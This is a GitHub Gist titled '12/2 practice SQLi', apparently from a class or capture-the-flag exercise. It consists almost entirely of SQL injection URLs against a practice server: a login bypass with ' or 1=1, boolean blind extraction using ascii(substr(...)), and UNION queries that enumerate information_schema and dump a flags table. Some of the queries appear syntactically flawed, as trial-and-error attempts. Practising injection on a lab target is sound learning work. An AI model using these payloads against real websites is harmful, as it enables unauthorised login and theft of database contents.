Last active
August 29, 2015 14:10
-
-
Save fkztw/8fdbb186b26fd08d5fa0 to your computer and use it in GitHub Desktop.
12/2 practice SQLi
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| http://tor.atdog.tw:8080/boolean/login.php?u=admin&p=admin | |
| http://tor.atdog.tw:8080/boolean/login.php?u=admin&p=admin' or 1=1 %23 | |
| http://tor.atdog.tw:8080/boolean/login.php?u=admin&p=admin' and ascii(substr(user(), 1, 1)) < 128 %23 | |
| http://tor.atdog.tw:8080/boolean/login.php?u=admin&p=admin' and (SELECT table_schema,table_name FROM information_schema.tables limit 1) %23 | |
| http://tor.atdog.tw:8080/boolean/login.php?u=admin&p=admin' and ascii(substr((SELECT table_schema,table_name FROM information_schema.tables limit 1,1), 1, 1)) < 128 %23 | |
| http://tor.atdog.tw:8080/boolean/login.php?u=admin&p=admin' and ascii(substr((SELECT table_schema,table_name FROM information_schema.tables), 1, 1)) < 128 %23 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| http://tor.atdog.tw:8080/union/news.php?id=1 ) union ( SELECT table_schema,table_name FROM information_schema.tables | |
| http://tor.atdog.tw:8080/union/news.php?id=1 ) union ( SELECT table_name, column_name FROM information_schema.columns | |
| http://tor.atdog.tw:8080/union/news.php?id=1 ) union ( SELECT id, flag FROM wtf_flags |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment